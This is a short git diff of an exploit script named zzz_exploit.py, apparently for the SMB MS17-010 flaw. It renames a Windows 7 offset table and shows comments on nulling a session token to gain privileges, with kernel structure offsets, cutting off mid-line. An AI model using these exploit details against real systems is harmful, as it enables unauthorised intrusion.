diff --git a/zzz_exploit.py b/zzz_exploit.py index 9fe4dab..2de8ccf 100644 --- a/zzz_exploit.py +++ b/zzz_exploit.py @@ -66,7 +66,7 @@ If we can overwrite Token to NULL and UsePsImpersonateClient to true, a running to do all SMB operations. Note: fake Token might be possible, but NULL token is much easier. ''' -WIN7_INFO = { +WIN7_64_INFO = { 'SESSION_SECCTX_OFFSET': 0xa0, 'SESSION_ISNULL_OFFSET': 0xba, 'FAKE_SECCTX': pack('